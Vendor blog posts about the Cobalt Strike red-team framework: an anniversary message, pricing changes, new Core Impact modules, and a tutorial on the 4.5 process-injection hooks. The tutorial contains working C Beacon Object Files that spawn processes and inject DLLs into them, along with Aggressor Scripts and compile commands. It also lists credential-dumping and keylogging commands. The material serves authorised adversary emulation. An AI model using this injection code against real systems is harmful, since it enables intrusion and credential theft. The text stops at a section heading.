Celebrating 10 Years of Cobalt Strike

 

Can you believe it? Cobalt Strike is 10 years old! Think back to the summer of 2012. The Olympics were taking place in London. CERN announced the discovery of a new particle. The Mars Rover, Curiosity, successfully landed on the red planet. And despite the numerous eschatological claims of the world ending by December, Raphael Mudge diligently worked to create and debut a solution unique to the cybersecurity market.

Raphael designed Cobalt Strike as a big brother to Armitage, his original project that served as a graphical cyber-attack management tool for Metasploit. Cobalt Strike quickly took off as an advanced adversary emulation tool ideal for post-exploitation exercises by Red Teams.

Flash forward to 2022 and not only is the world still turning, Cobalt Strike continues to mature, having become a favorite tool of top cybersecurity experts. The Cobalt Strike team has also grown accordingly, with more members than ever working on research activities to further add features, enhance security, and fulfill customer requests. With version 4.7 nearly ready, we’re eager to show you what we’ve been working on.

However, we’d be remiss not to pause and thank the Cobalt Strike user community for all you’ve done over the years to help this solution evolve. But how could we best show our appreciation? A glitter unicorn card talking about “celebrating the journey”? A flash mob dance to Hall & Oates’ “You Make My Dreams Come True”? A plane hired to write “With users like you, we’ve Cobalt Struck gold!”? It turns out that it is very difficult to express gratitude in a non-cheesy way, but we’ve tried our best with the following video:


Building Upon a Strong Foundation

 

In the weeks ahead, Cobalt Strike 4.6 will go live as a minor foundational release before we move into our new development model. This release will be less about features and more about bolstering security even further. This is all in preparation for a much bigger release later, which will also serve as a celebration of Cobalt Strike’s 10th birthday. As we approach this 10-year anniversary, we’ve also taken the time to reflect on the incredible journey of this product.

Raphael Mudge created and developed Cobalt Strike for many years, entirely on his own. With the acquisition by HelpSystems more than two years ago, additional support came along to bring about some great new features, including the reconnect button, new Aggressor Script hooks, the Sleep Mask Kit, and the User Defined Reflective Loader (UDRL).

Now, with Raphael’s vision always in mind, we have a growing team focused on supporting this solution to bring more stability and flexibility. We’re also dedicating additional resources to research activities, with the goal of creating and releasing new tools into the Community Kit and the Cobalt Strike arsenal. Additionally, we are placing a great deal of emphasis on the security of the product itself in order to prevent misuse by malicious, non-licensed users.

With this increased investment come additional costs and a pricing change. In appreciation for current Cobalt Strike users and their support of the solution, the change will not affect existing customer renewals. The price of Cobalt Strike for new licenses and customers will be $5,900 per user ($3,540 when bundled with other offensive security products) for a one-year license.*

The pricing for the Offensive Security – Advanced Bundle of Cobalt Strike and Core Impact will remain the same so you can pair any version of Core Impact—basic, pro, or enterprise—with Cobalt Strike at a reduced cost. Cobalt Strike’s interoperability with Core Impact highlights another one of the advantages of being part of a company with an ever-growing list of cybersecurity offerings. Developers of these products work together to help organizations create a cohesive security strategy that provides full coverage of their environments.

As we continue to evolve with the threat landscape and strengthen Cobalt Strike accordingly, a permanent fixture in our strategy will always be to listen to our customers. Many aspects of our updates are a direct result of customer feedback, so we encourage you to keep being vocal about the features that you most want to see. 

*US Pricing Only

Incorporating New Tools into Core Impact

 

Core Impact has further enhanced the pen testing process with the introduction of two new modules. The first module enables the use of .NET assemblies, while the second module provides the ability to use BloodHound, a data analysis tool that uncovers hidden relationships within an Active Directory (AD) environment. In this blog, we’ll dive into how Core Impact users can put these new modules into action during their engagements.

In-memory .NET Assembly Execution

With the Core Impact “.NET Assembly Execution” module you can now include .NET assemblies in your engagements. This module accepts a path to a local executable assembly and runs it on a given target. You may pass arbitrary arguments, quoted or not, to this program as if you ran it from a command shell. It can be executed in a sacrificial process using the fork and run technique or inline in the agent process.

Sharing Resources: Core Impact and Cobalt Strike

Cobalt Strike, our adversary simulation tool that focuses on post-exploitation, also uses .NET assembly tools. The “.NET Assembly Execution” module is compatible with extensions commonly employed by Cobalt Strike users, providing an opportunity to broaden the reach of Core Impact. Any executions that employ the execute-assembly command in Cobalt Strike can be used as a shared resource when using both products for a testing engagement. Additionally, these two solutions can be bundled together.

Some modules used by Cobalt Strike that can now be used within Core Impact include:

AD Data Collection using BloodHound

Another module, “Get AD data with SharpHound (BloodHound Collector),” is based on the same technology as the first. It was developed to enable the use of BloodHound during an Active Directory attack to facilitate the reconnaissance steps. BloodHound works by analyzing data about AD collected from domain controllers and domain-joined Windows systems, quickly detecting complex attack paths for lateral movement, privilege escalation, and more. Users can now incorporate these capabilities into their engagements to help identify these attack paths before threat actors do.

Expand Your Security Tests Even Further

With the introduction of these modules, Core Impact continues to help unify security. In addition to these modules, Core Impact integrates with other security tools, including multiple vulnerability scanners, PowerShell Empire, Plextrac, and more. Core Impact is particularly aligned with Cobalt Strike, with interoperability features like session passing as well as the new “.NET Assembly Execution” module.

Successful security testing involves both talented cybersecurity professionals and the right portfolio of tools. Solutions that work with one another can help to maximize resources, reduce console fatigue, and standardize reporting. Tools like Core Impact can help serve as a point of centralization, helping organizations to advance their vulnerability management programs without overcomplicating strategies.

Process Injection Update in Cobalt Strike 4.5

 

Process injection is a core component of Cobalt Strike post-exploitation. Until now, the only option was to use a built-in injection technique using fork&run. This has been great for stability, but it comes at the cost of OPSEC.

Cobalt Strike 4.5 now supports two new Aggressor Script hooks: PROCESS_INJECT_SPAWN and PROCESS_INJECT_EXPLICIT.  These hooks allow a user to define how the fork&run and explicit injection techniques are implemented when executing post-exploitation commands instead of using the built-in techniques. 

The implementation of these techniques is through a Beacon Object File (BOF) and an Aggressor Script function.  In the next sections a simple example will be provided followed by an example from the Community Kit for each hook. 

These two hooks cover most of the post-exploitation commands, which are listed in each section.  However, the following exceptions will not use these hooks:

Beacon Command      Aggressor Script function
-                   &bdllspawn
execute-assembly    &bexecute_assembly
shell               &bshell

Exceptions to the 4.5 process injection updates

Process Injection Spawn (Fork & Run)

The PROCESS_INJECT_SPAWN hook is used to define the fork&run process injection technique.  The Beacon commands, Aggressor Script functions, and UI interfaces listed in the table below call the hook, so the user can either implement their own technique or use the built-in technique.

Additional information for a few commands: 

  1. The elevate, runasadmin, &belevate, and &brunasadmin commands and the [beacon] -> Access -> Elevate interface will only use the PROCESS_INJECT_SPAWN hook when the specified exploit uses one of the Aggressor Script functions listed in the table, for example &bpowerpick.
  2. For the net and &bnet commands, the ‘domain’ command will not use the hook.
  3. The “(use a hash)” note means select a credential that references a hash.

Beacon Command    Aggressor Script function    UI Interface
chromedump        -                            -
dcsync            &bdcsync                     -
elevate           &belevate                    [beacon] -> Access -> Elevate
-                 -                            [beacon] -> Access -> Golden Ticket
hashdump          &bhashdump                   [beacon] -> Access -> Dump Hashes
keylogger         &bkeylogger                  -
logonpasswords    &blogonpasswords             [beacon] -> Access -> Run Mimikatz
-                 -                            [beacon] -> Access -> Make Token (use a hash)
mimikatz          &bmimikatz                   -
-                 &bmimikatz_small             -
net               &bnet                        [beacon] -> Explore -> Net View
portscan          &bportscan                   [beacon] -> Explore -> Port Scan
powerpick         &bpowerpick                  -
printscreen       &bprintscreen                -
pth               &bpassthehash                -
runasadmin        &brunasadmin                 -
-                 -                            [target] -> Scan
screenshot        &bscreenshot                 [beacon] -> Explore -> Screenshot
screenwatch       &bscreenwatch                -
ssh               &bssh                        [target] -> Jump -> ssh
ssh-key           &bssh_key                    [target] -> Jump -> ssh-key
-                 -                            [target] -> Jump -> [exploit] (use a hash)

Commands that support the PROCESS_INJECT_SPAWN hook in 4.5

Arguments 

The PROCESS_INJECT_SPAWN hook accepts the following arguments:

  • $1 Beacon ID 
  • $2 memory injectable DLL (position-independent code) 
  • $3 true/false ignore process token 
  • $4 x86/x64 – memory injectable DLL architecture 

Returns 

The PROCESS_INJECT_SPAWN hook should return one of the following values: 

  • $null or empty string to use the built-in technique. 
  • 1 or any non-empty value to use your own fork&run injection technique. 
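
The return contract above can be restated in a few lines of C. This is only an illustrative model of how a caller might interpret the hook's result; the function names are hypothetical, and Cobalt Strike's internal handling is not shown in this post.

```c
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical model of the hook's return contract (not Cobalt Strike code):
 * NULL or "" means "fall back to the built-in technique";
 * any non-empty value means "the script performed the injection itself". */
bool hook_result_uses_custom(const char *hook_result) {
    return hook_result != NULL && hook_result[0] != '\0';
}

/* Label for the technique a caller would end up using. */
const char *technique_for(const char *hook_result) {
    return hook_result_uses_custom(hook_result) ? "custom" : "built-in";
}
```

Under this model, a hook that cannot handle a given session (for example, an x64-only BOF asked to run in an x86 Beacon) would return $null, so that technique_for yields "built-in".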

I Want to Use My Own Spawn (Fork & Run) Injection Technique

To implement your own fork&run injection technique you will be required to supply a BOF containing your executable code for x86 and/or x64 architectures and an Aggressor Script file containing the PROCESS_INJECT_SPAWN hook function. 

Simple Example 

The following example implements the PROCESS_INJECT_SPAWN hook to bypass the built-in default.  First, we will create a BOF with our fork&run implementation. 

File: inject_spawn.c

#include <windows.h>
#include "beacon.h"

/* is this an x64 BOF */
BOOL is_x64() {
#if defined _M_X64
   return TRUE;
#elif defined _M_IX86
   return FALSE;
#endif
}

/* See gox86 and gox64 entry points */
void go(char * args, int alen, BOOL x86) {
   STARTUPINFOA        si;
   PROCESS_INFORMATION pi;
   datap               parser;
   short               ignoreToken;
   char *              dllPtr;
   int                 dllLen;

   /* Warn about crossing to another architecture. */
   if (!is_x64() && x86 == FALSE) {
      BeaconPrintf(CALLBACK_ERROR, "Warning: inject from x86 -> x64");
   }
   if (is_x64() && x86 == TRUE) {
      BeaconPrintf(CALLBACK_ERROR, "Warning: inject from x64 -> x86");
   }

   /* Extract the arguments */
   BeaconDataParse(&parser, args, alen);
   ignoreToken = BeaconDataShort(&parser);
   dllPtr = BeaconDataExtract(&parser, &dllLen);

   /* zero out these data structures */
   __stosb((void *)&si, 0, sizeof(STARTUPINFO));
   __stosb((void *)&pi, 0, sizeof(PROCESS_INFORMATION));

   /* setup the other values in our startup info structure */
   si.dwFlags = STARTF_USESHOWWINDOW;
   si.wShowWindow = SW_HIDE;
   si.cb = sizeof(STARTUPINFO);

   /* Ready to go: spawn, inject and cleanup */
   if (!BeaconSpawnTemporaryProcess(x86, ignoreToken, &si, &pi)) {
      BeaconPrintf(CALLBACK_ERROR, "Unable to spawn %s temporary process.", x86 ? "x86" : "x64");
      return;
   }
   BeaconInjectTemporaryProcess(&pi, dllPtr, dllLen, 0, NULL, 0);
   BeaconCleanupProcess(&pi);
}

void gox86(char * args, int alen) {
   go(args, alen, TRUE);
}

void gox64(char * args, int alen) {
   go(args, alen, FALSE);
}


Explanation

  • Line 14 starts the code for the go function. This function is called via the gox86 or gox64 functions, which are defined at lines 53-59.  This function style is an easy way to pass the x86 boolean flag into the go function. 
  • Lines 15-20 define the variables that are referenced in the function. 
  • Lines 22-28 check whether the runtime environment matches the x86 flag; on a mismatch they print a warning message back to the Beacon console and continue. 
  • Lines 30-33 extract the two arguments, ignoreToken and dll, from the args parameter. 
  • Lines 35-42 initialize the STARTUPINFO and PROCESS_INFORMATION variables. 
  • Lines 44-50 implement the fork&run technique using Beacon’s internal APIs defined in beacon.h.  This is essentially the same as the built-in technique of spawning a temporary process, injecting the dll into the process, and cleaning up. 

Compile

Next, compile the source code to generate the .o files using the mingw compiler on Linux. 

x86_64-w64-mingw32-gcc -o inject_spawn.x64.o -c inject_spawn.c 

i686-w64-mingw32-gcc -o inject_spawn.x86.o -c inject_spawn.c 

Create Aggressor Script

File: inject_spawn.cna

# Hook to allow the user to define how the fork and run process injection
# technique is implemented when executing post exploitation commands.
# $1 = Beacon ID
# $2 = memory injectable dll (position-independent code)
# $3 = true/false ignore process token
# $4 = x86/x64 - memory injectable DLL arch
set PROCESS_INJECT_SPAWN {
   local('$barch $handle $data $args $entry');

   # Set the architecture for the beacon's session
   $barch = barch($1);

   # read in the injection BOF based on barch
   warn("read the BOF: inject_spawn. $+ $barch $+ .o");
   $handle = openf(script_resource("inject_spawn. $+ $barch $+ .o"));
   $data = readb($handle, -1);
   closef($handle);

   # pack our arguments needed for the BOF
   $args = bof_pack($1, "sb", $3, $2);

   btask($1, "Process Inject using fork and run.");

   # Set the entry point based on the dll's arch
   $entry = "go $+ $4";
   beacon_inline_execute($1, $data, $entry, $args);

   # Let the caller know the hook was implemented.
   return 1;
}

Explanation

  • Lines 1-6 are the header information about the function and arguments. 
  • Line 7 starts the function definition for the PROCESS_INJECT_SPAWN function. 
  • Line 8 defines the variables used in the function. 
  • Lines 10-11 set the architecture for the Beacon’s session. 
  • Lines 14-17 read the inject_spawn.<arch>.o BOF which matches the Beacon’s session architecture.  This is required because the beacon_inline_execute function requires the BOF architecture to match the Beacon’s architecture. 
  • Lines 19-20 pack the arguments that the BOF is expecting.  In this example we are passing $3 (ignore process token) as a short and $2 (dll) as binary data. 
  • Line 22 reports the task to Beacon. 
  • Line 25 sets up which function name to call in the BOF, either gox86 or gox64, based on the dll’s architecture.  Note that the Beacon’s architecture and the dll’s architecture do not have to match.  For example, if your Beacon is running in an x86 context on an x64 OS, then some post-exploitation jobs such as mimikatz will use the x64 version of the mimikatz dll. 
  • Line 26 uses the beacon_inline_execute function to execute the BOF. 
  • Line 29 returns 1 to indicate the PROCESS_INJECT_SPAWN function was implemented. 
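
The format string given to bof_pack and the order of the BeaconData* calls in the BOF have to agree: "sb" packs a short followed by a binary blob, so the BOF reads a short and then extracts a buffer. The sketch below illustrates that ordering requirement with a deliberately simplified, assumed buffer layout (a 2-byte short, then a 4-byte length and the bytes, all little-endian). It is not Beacon's actual wire format, and cursor, pack_sb, read_short, and read_blob are hypothetical stand-ins rather than Beacon APIs.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical cursor over a packed argument buffer (a stand-in for datap). */
typedef struct {
    const uint8_t *cur;
    size_t         left;
} cursor;

/* Pack a short, then a length-prefixed blob: the "sb" order.
 * Returns the number of bytes written, or 0 if out is too small. */
size_t pack_sb(uint8_t *out, size_t cap, int16_t s, const void *blob, uint32_t len) {
    size_t   need = 2 + 4 + (size_t)len;
    uint16_t u    = (uint16_t)s;
    if (cap < need) return 0;
    out[0] = (uint8_t)(u & 0xff);
    out[1] = (uint8_t)(u >> 8);
    out[2] = (uint8_t)(len & 0xff);
    out[3] = (uint8_t)((len >> 8) & 0xff);
    out[4] = (uint8_t)((len >> 16) & 0xff);
    out[5] = (uint8_t)((len >> 24) & 0xff);
    memcpy(out + 6, blob, len);
    return need;
}

/* Read the short that was packed first. Returns 0 if the buffer is exhausted. */
int16_t read_short(cursor *c) {
    uint16_t u;
    if (c->left < 2) return 0;
    u = (uint16_t)(c->cur[0] | (c->cur[1] << 8));
    c->cur += 2;
    c->left -= 2;
    return (int16_t)u;
}

/* Read the length-prefixed blob that was packed second.
 * Returns NULL if the buffer is too short for the declared length. */
const uint8_t *read_blob(cursor *c, uint32_t *len) {
    const uint8_t *p;
    uint32_t       n;
    if (c->left < 4) return NULL;
    n = (uint32_t)c->cur[0] | ((uint32_t)c->cur[1] << 8) |
        ((uint32_t)c->cur[2] << 16) | ((uint32_t)c->cur[3] << 24);
    if (c->left - 4 < n) return NULL;
    p = c->cur + 4;
    c->cur += 4 + (size_t)n;
    c->left -= 4 + (size_t)n;
    *len = n;
    return p;
}
```

Reading in a different order than the data was packed (for example, calling read_blob before read_short) would interpret the short and part of the length as a bogus length field, which is why the script's "sb" format and the BOF's parse order must stay in step.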

Load the Aggressor Script and Begin Using the Updated Hook

Next, load the inject_spawn.cna Aggressor Script file into the Cobalt Strike client through the Cobalt Strike -> Script Manager interface.  Once the script is loaded you can execute the post exploitation commands defined in the table above and the command will now use this implementation. 

Example Using the screenshot Command

After loading the script, a command like screenshot will use the new hook.

screenshot command using the PROCESS_INJECT_SPAWN hook
Output in the script console when reading the BOF

PROCESS_INJECT_SPAWN

Example from the Community Kit

Now that we have gone through the simple example to get some understanding of how the PROCESS_INJECT_SPAWN hook works, let’s try something from the Community Kit. The example used here is from the BOFs project https://github.com/ajpc500/BOFs.  For the fork&run implementation, use the example under the StaticSyscallsAPCSpawn folder. It implements the spawn with syscalls shellcode injection (NtMapViewOfSection -> NtQueueApcThread) technique.

Steps: 

  1. Clone or download the source for the BOF project. 
  2. Change directory into the StaticSyscallsAPCSpawn directory 
  3. Review the code within the directory to understand what is being done. 
  4. Compile the object file with the following command. (Optionally use make) 
x86_64-w64-mingw32-gcc -o syscallsapcspawn.x64.o -c entry.c -masm=intel 

When using projects from the Community Kit it is good practice to review the code and recompile the source even if object or binary files are provided.

Items to note in the entry.c file that differ from the simple example: 

  1. For this BOF notice that the entry point is ‘go’, rather than ‘gox86’ or ‘gox64’. 
  2. The argument that this BOF expects is the dll.  The ignoreToken is not used. 
  3. The BOF calls a function named SpawnProcess, which uses the Beacon API function BeaconSpawnTemporaryProcess.  In this case the x86 parameter is hard coded to FALSE and the ignoreToken is hard coded to TRUE. 
  4. It then calls a function named InjectShellcode, which implements the project’s own injection technique instead of using the function BeaconInjectTemporaryProcess. 
  5. Finally, it calls the Beacon API function BeaconCleanupProcess. 

Now that we understand the differences between the simple example and this project’s code, we can modify the PROCESS_INJECT_SPAWN function from the simple example to work with this project.  Here is the modified PROCESS_INJECT_SPAWN function, which can be put into a new file or added to the existing static_syscalls_apc_spawn.cna file. 

File: static_syscalls_apc_spawn.cna 

    # Hook to allow the user to define how the fork and run process injection 
    # technique is implemented when executing post exploitation commands. 
    # $1 = Beacon ID 
    # $2 = memory injectable dll (position-independent code) 
    # $3 = true/false ignore process token 
    # $4 = x86/x64 - memory injectable DLL arch 
    set PROCESS_INJECT_SPAWN { 
    
    local('$barch $handle $data $args'); 
    
        # figure out the arch of this session 
        $barch  = barch($1); 
        
        if ($barch eq "x86") { 
            warn("Syscalls Spawn and Shellcode APC Injection BOF (@ajpc500) does not support x86. Use built in default"); 
            return $null; 
        } 
        
        # read in the right BOF 
        warn("read the BOF: syscallsapcspawn. $+ $barch $+ .o"); 
        $handle = openf(script_resource("syscallsapcspawn. $+ $barch $+ .o")); 
        $data = readb($handle, -1); 
        closef($handle); 
        
        # pack our arguments needed for the BOF 
        $args = bof_pack($1, "b", $2); 
        
        btask($1, "Syscalls Spawn and Shellcode APC Injection BOF (@ajpc500)"); 
        
        beacon_inline_execute($1, $data, "go", $args); 
        
        # Let the caller know the hook was implemented. 
        return 1; 
    } 

Explanation

  • Lines 1-6 are the header information about the function and arguments. 
  • Line 7 starts the function definition for the PROCESS_INJECT_SPAWN function. 
  • Line 9 defines the variables used in the function. In this example we do not need the $entry variable as the entry point will just be “go”. 
  • Line 12 sets $barch to the Beacon’s architecture. 
  • Lines 14-17 are added in this example because this project only supports x64 architecture injection.  When an x86 architecture is detected, the hook returns $null to use the built-in technique. 
  • Lines 19-23 read the syscallsapcspawn.<arch>.o BOF which matches the Beacon’s session architecture.  This is required because the beacon_inline_execute function requires the BOF architecture to match the Beacon’s architecture. 
  • Lines 25-26 pack the arguments that the BOF is expecting.  In this example we are passing $2 (dll) as binary data.  Recall that the ignoreToken flag was hard coded to TRUE. 
  • Line 28 reports the task to Beacon. 
  • Line 30 uses the beacon_inline_execute function to execute the BOF.  In this case it just calls “go”, since there is no need to know whether the dll is x86 or x64: the x86 flag is hard coded to FALSE. 
  • Line 33 returns 1 to indicate the PROCESS_INJECT_SPAWN function was implemented. 

Load the Aggressor Script and Begin Using the Updated Hook

Next, load the Aggressor Script file into the Cobalt Strike client through the Cobalt Strike -> Script Manager interface.  Once the script is loaded you can execute the post exploitation commands defined in the table above and the command will now use this implementation. 

Example Using the keylogger Command

After loading the script, a command like keylogger will use the new hook.

keylogger command using the PROCESS_INJECT_SPAWN hook
Output in the script console when reading the BOF

Explicit Process Injection (Put Down That Fork)

The PROCESS_INJECT_EXPLICIT hook is used to define the explicit process injection technique.  The Beacon commands, Aggressor Script functions, and UI interfaces listed in the table below call the hook, so the user can either implement their own technique or use the built-in technique.

Additional information for a few commands: 

  1. The [Process Browser] interface is accessed by [beacon] -> Explore -> Process List.  There is also a multi version of this interface, which is accessed by selecting multiple Beacon sessions and using the same UI menu.  When in the Process Browser, use the buttons to perform additional commands on the selected process. 
  2. The chromedump, dcsync, hashdump, keylogger, logonpasswords, mimikatz, net, portscan, printscreen, pth, screenshot, screenwatch, ssh, and ssh-key commands also have a fork&run version.  Using the explicit version requires the pid and architecture arguments. 
  3. For the net and &bnet commands, the ‘domain’ command will not use the hook. 

Beacon Command    Aggressor Script function    UI Interface
browserpivot      &bbrowserpivot               [beacon] -> Explore -> Browser Pivot
chromedump        -                            -
dcsync            &bdcsync                     -
dllinject         &bdllinject                  -
hashdump          &bhashdump                   -
inject            &binject                     [Process Browser] -> Inject
keylogger         &bkeylogger                  [Process Browser] -> Log Keystrokes
logonpasswords    &blogonpasswords             -
mimikatz          &bmimikatz                   -
-                 &bmimikatz_small             -
net               &bnet                        -
portscan          &bportscan                   -
printscreen       -                            -
psinject          &bpsinject                   -
pth               &bpassthehash                -
screenshot        -                            [Process Browser] -> Screenshot (Yes)
screenwatch       -                            [Process Browser] -> Screenshot (No)
shinject          &bshinject                   -
ssh               &bssh                        -
ssh-key           &bssh_key                    -

Commands that support the PROCESS_INJECT_EXPLICIT hook in 4.5

Arguments 

The PROCESS_INJECT_EXPLICIT hook accepts the following arguments:

  • $1 Beacon ID 
  • $2 memory injectable DLL (position-independent code) 
  • $3 the PID to inject into 
  • $4 offset to jump to 
  • $5 x86/x64 – memory injectable DLL architecture 

Returns 

The PROCESS_INJECT_EXPLICIT hook should return one of the following values: 

  • $null or empty string to use the built-in technique. 
  • 1 or any non-empty value to use your own explicit injection technique. 

I Want to Use My Own Explicit Injection Technique.

To implement your own explicit injection technique, you will be required to supply a BOF containing your executable code for x86 and/or x64 architectures and an Aggressor Script file containing the PROCESS_INJECT_EXPLICIT hook function. 

Simple Example 

The following example implements the PROCESS_INJECT_EXPLICIT hook to bypass the built-in default.  First, we will create a BOF with our explicit injection implementation. 

File: inject_explicit.c

#include <windows.h>
#include "beacon.h"

/* Windows API calls */
DECLSPEC_IMPORT WINBASEAPI WINBOOL WINAPI KERNEL32$IsWow64Process (HANDLE hProcess, PBOOL Wow64Process);
DECLSPEC_IMPORT WINBASEAPI HANDLE  WINAPI KERNEL32$GetCurrentProcess (VOID);
DECLSPEC_IMPORT WINBASEAPI HANDLE  WINAPI KERNEL32$OpenProcess (DWORD dwDesiredAccess, WINBOOL bInheritHandle, DWORD dwProcessId);
DECLSPEC_IMPORT WINBASEAPI DWORD   WINAPI KERNEL32$GetLastError (VOID);
DECLSPEC_IMPORT WINBASEAPI WINBOOL WINAPI KERNEL32$CloseHandle (HANDLE hObject);

/* is this an x64 BOF */
BOOL is_x64() {
#if defined _M_X64
   return TRUE;
#elif defined _M_IX86
   return FALSE;
#endif
}

/* is this a 64-bit or 32-bit process? */
BOOL is_wow64(HANDLE process) {
   BOOL bIsWow64 = FALSE;

   if (!KERNEL32$IsWow64Process(process, &bIsWow64)) {
      return FALSE;
   }
   return bIsWow64;
}

/* check if a process is x64 or not */
BOOL is_x64_process(HANDLE process) {
   if (is_x64() || is_wow64(KERNEL32$GetCurrentProcess())) {
      return !is_wow64(process);
   }

   return FALSE;
}

/* See gox86 and gox64 entry points */
void go(char * args, int alen, BOOL x86) {
   HANDLE              hProcess;
   datap               parser;
   int                 pid;
   int                 offset;
   char *              dllPtr;
   int                 dllLen;

   /* Extract the arguments */
   BeaconDataParse(&parser, args, alen);
   pid = BeaconDataInt(&parser);
   offset = BeaconDataInt(&parser);
   dllPtr = BeaconDataExtract(&parser, &dllLen);

   /* Open a handle to the process, for injection. */
   hProcess = KERNEL32$OpenProcess(PROCESS_CREATE_THREAD | PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, FALSE, pid);
   if (hProcess == INVALID_HANDLE_VALUE || hProcess == 0) {
      BeaconPrintf(CALLBACK_ERROR, "Unable to open process %d : %d", pid, KERNEL32$GetLastError());
      return;
   }

   /* Check that we can inject the content into the process. */
   if (!is_x64_process(hProcess) && x86 == FALSE ) {
      BeaconPrintf(CALLBACK_ERROR, "%d is an x86 process (can't inject x64 content)", pid);
      return;
   }
   if (is_x64_process(hProcess) && x86 == TRUE) {
      BeaconPrintf(CALLBACK_ERROR, "%d is an x64 process (can't inject x86 content)", pid);
      return;
   }

   /* inject into the process */
   BeaconInjectProcess(hProcess, pid, dllPtr, dllLen, offset, NULL, 0);

   /* Clean up */
   KERNEL32$CloseHandle(hProcess);
}

void gox86(char * args, int alen) {
   go(args, alen, TRUE);
}

void gox64(char * args, int alen) {
   go(args, alen, FALSE);
}

Explanation

  • Lines 1-2 are the include files, where beacon.h can be downloaded from https://github.com/Cobalt-Strike/bof_template
  • Lines 4-9 define the prototypes for the Dynamic Function Resolution for a BOF. 
  • Lines 11-18 define a function to determine the compiled architecture type. 
  • Lines 20-37 define functions to determine the architecture of the process to inject into. 
  • Line 40 starts the code for the go function. This function is called via the gox86 or gox64 functions, which are defined at lines 78-84.  This function style is an easy way to pass the x86 boolean flag into the go function. 
  • Lines 41-46 define the variables that are referenced in the function. 
  • Lines 48-52 will extract the three arguments pid, offset and dll from the args parameter. 
  • Lines 55-59 will open the process for the specified pid. 
  • Lines 61-69 will verify if the content can be injected into the process. 
  • Line 72 implements the explicit injection technique using Beacon’s internal APIs defined in beacon.h.  This is the same built-in technique for injecting into a process. 
  • Line 75 closes the handle to the process. 
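
The architecture checks on lines 61-69, together with is_x64_process, boil down to a small truth table. The sketch below restates that logic in plain C with the Windows calls replaced by boolean inputs, so it can be read and compiled anywhere. The function and parameter names are hypothetical and are not part of the BOF above.

```c
#include <stdbool.h>

/* Mirrors is_x64_process(): a WOW64 process is 32-bit, and on a 64-bit OS
 * any non-WOW64 process is 64-bit. The OS is known to be 64-bit when the
 * BOF itself is an x64 build or the current process runs under WOW64. */
bool target_is_x64(bool bof_is_x64, bool self_is_wow64, bool target_is_wow64) {
    if (bof_is_x64 || self_is_wow64) {
        return !target_is_wow64;
    }
    return false; /* 32-bit OS: every process is x86 */
}

/* Mirrors the two guard clauses in go(): the content's architecture
 * must match the architecture of the target process. */
bool can_inject(bool target_x64, bool content_is_x86) {
    if (!target_x64 && !content_is_x86) return false; /* x64 content, x86 process */
    if (target_x64 && content_is_x86)   return false; /* x86 content, x64 process */
    return true;
}
```

For instance, an x86 Beacon running under WOW64 that targets a native process gets target_is_x64(false, true, false) == true, so only x64 content passes can_inject.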

Compile

Next, compile the source code to generate the .o files using the mingw compiler on Linux. 

x86_64-w64-mingw32-gcc -o inject_explicit.x64.o -c inject_explicit.c 

i686-w64-mingw32-gcc -o inject_explicit.x86.o -c inject_explicit.c 

Create Aggressor Script

Next, create the Aggressor Script PROCESS_INJECT_EXPLICIT hook function. 

File: inject_explicit.cna

# Hook to allow the user to define how the explicit injection technique
# is implemented when executing post exploitation commands.
# $1 = Beacon ID
# $2 = memory injectable dll for the post exploitation command
# $3 = the PID to inject into
# $4 = offset to jump to
# $5 = x86/x64 - memory injectable DLL arch
set PROCESS_INJECT_EXPLICIT {
   local('$barch $handle $data $args $entry');

   # Set the architecture for the beacon's session
   $barch = barch($1);

   # read in the injection BOF based on barch
   warn("read the BOF: inject_explicit. $+ $barch $+ .o");
   $handle = openf(script_resource("inject_explicit. $+ $barch $+ .o"));
   $data = readb($handle, -1);
   closef($handle);

   # pack our arguments needed for the BOF
   $args = bof_pack($1, "iib", $3, $4, $2);

   btask($1, "Process Inject using explicit injection into pid $3");

   # Set the entry point based on the dll's arch
   $entry = "go $+ $5";
   beacon_inline_execute($1, $data, $entry, $args);

   # Let the caller know the hook was implemented.
   return 1;
}

Explanation

  • Lines 1-7 contain the header information about the function and arguments. 
  • Line 8 starts the function definition for the PROCESS_INJECT_EXPLICIT function. 
  • Line 9 defines the variables used in the function. 
  • Line 12 sets the architecture for the Beacon’s session. 
  • Lines 15-18 read the inject_explicit.<arch>.o BOF which matches the Beacon’s session architecture.  This is required because the beacon_inline_execute function requires the BOF architecture to match the Beacon’s architecture. 
  • Line 21 packs the arguments that the BOF is expecting.  In this example we are passing $3 (pid) as an integer, $4 (offset) as an integer, and $2 (dll) as binary data. 
  • Line 23 reports the task to Beacon. 
  • Line 26 sets up which function name to call in the BOF, either gox86 or gox64, based on the dll’s architecture.  Note that the Beacon’s architecture and the dll’s architecture do not have to match. 
  • Line 27 uses the beacon_inline_execute function to execute the BOF. 
  • Line 30 returns 1 to indicate the PROCESS_INJECT_EXPLICIT function was implemented. 
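
Two different architectures are in play in this script: the BOF object file is chosen by the Beacon's architecture, while the entry point is chosen by the DLL's architecture. As a rough illustration, the two `$+` string concatenations can be mirrored in C as follows; the helper names are hypothetical and exist only for this sketch.

```c
#include <stdio.h>
#include <string.h>

/* Returns 1 if arch is one of the two values the hook passes ("x86" or "x64"). */
static int valid_arch(const char *arch) {
    return arch != NULL && (strcmp(arch, "x86") == 0 || strcmp(arch, "x64") == 0);
}

/* Build "inject_explicit.<beacon arch>.o". Returns 0 on success, -1 on error. */
int bof_file_name(char *out, size_t cap, const char *beacon_arch) {
    int n;
    if (!valid_arch(beacon_arch)) return -1;
    n = snprintf(out, cap, "inject_explicit.%s.o", beacon_arch);
    return (n >= 0 && (size_t)n < cap) ? 0 : -1;
}

/* Build "go<dll arch>", i.e. "gox86" or "gox64". Returns 0 on success, -1 on error. */
int entry_point_name(char *out, size_t cap, const char *dll_arch) {
    int n;
    if (!valid_arch(dll_arch)) return -1;
    n = snprintf(out, cap, "go%s", dll_arch);
    return (n >= 0 && (size_t)n < cap) ? 0 : -1;
}
```

An x86 Beacon injecting an x64 DLL would therefore load inject_explicit.x86.o and call its gox64 entry point.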

Load the Aggressor Script and Begin Using the Updated Hook

Next, load the inject_explicit.cna Aggressor Script file into the Cobalt Strike client through the Cobalt Strike -> Script Manager interface.  Once the script is loaded you can execute the post exploitation commands defined in the table above and the command will now use this implementation. 

Example Using the screenshot Command

After loading the script, a command like screenshot will use the new hook.

screenshot command using the PROCESS_INJECT_EXPLICIT hook
Output in the script console when reading the BOF

PROCESS_INJECT_EXPLICIT

Example from the Community Kit

